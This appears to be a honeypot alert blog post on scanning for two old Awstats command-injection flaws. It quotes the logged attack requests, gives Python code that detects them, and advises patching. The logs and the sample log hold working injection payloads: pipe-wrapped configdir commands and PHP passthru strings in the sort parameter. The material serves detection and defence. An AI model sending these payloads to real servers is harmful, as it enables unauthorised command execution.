[Honeypot Alert] Awstats Command Injection Scanning Detected


Issue Detected

Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package.  Here are example attacks from the logs:

GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1

According to OSVDB, the scanners are probing for two different vulnerabilities:

Both of these vulnerability disclosures are old (2005 and 2008), so we are unsure why there is a sudden uptick in scanning.  If you are running Awstats software, you should make sure you are on a current version: http://awstats.sourceforge.net/
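As an added detection example (not code from the original post), the following Python classifies raw request lines like the ones logged above against both Awstats probe shapes: a pipe-wrapped configdir value for awstats.pl and a {${...}} PHP interpolation payload in the sort parameter of awstatstotals.php. The signature table, the function names and the sample log are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Signatures for the two Awstats probes seen in the logs above (constructed for this
# example): vulnerable script -> (parameter, pattern on the decoded value, label).
SIGNATURES = {
    # a pipe-wrapped configdir reaches Perl's open(), so the text between the pipes runs as a command
    "awstats.pl": ("configdir", re.compile(r"^\|.*\|$"),
                   "awstats.pl configdir command injection"),
    # {${expr}} is PHP complex-syntax interpolation, so expr is evaluated if the value lands in evaluated code
    "awstatstotals.php": ("sort", re.compile(r"\{\$\{.*\}\}"),
                          "awstatstotals.php sort PHP code injection"),
}

def parse_query(query):
    """Split a raw query string into a dict, percent-decoding keys and values.
    Hand-rolled instead of parse_qs so ';' inside a value is never treated as a separator."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params

def classify_request(request_line):
    """Return the signature label matching one HTTP request line, or None."""
    fields = request_line.split()
    if len(fields) < 2:
        return None
    target = urlsplit(fields[1])
    sig = SIGNATURES.get(target.path.rsplit("/", 1)[-1].lower())
    if sig is None:
        return None
    param, pattern, label = sig
    value = parse_query(target.query).get(param)
    return label if value is not None and pattern.search(value) else None

def scan_log(lines):
    """Return (line_number, label) for every request line that matches a signature."""
    labelled = ((n, classify_request(line.strip())) for n, line in enumerate(lines, 1))
    return [(n, label) for n, label in labelled if label]

# Constructed sample: two request lines from the post plus two benign Awstats requests.
SAMPLE_LOG = [
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0",
    "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1",
    "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1",
    "GET /stat/awstatstotals.php?sort=visits HTTP/1.1",
]
```

Matching is done on the percent-decoded value, so the encoded and unencoded forms of the same payload hit the same signature; the path check is by script name only, which is why all of the directory variants in the logs above are covered.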

Scanning Source Information

The scanning came from 59 different IP addresses (a few resolve to hostnames):


While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string: 

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0.

This leads us to believe that the attack was carried out by the same source client.
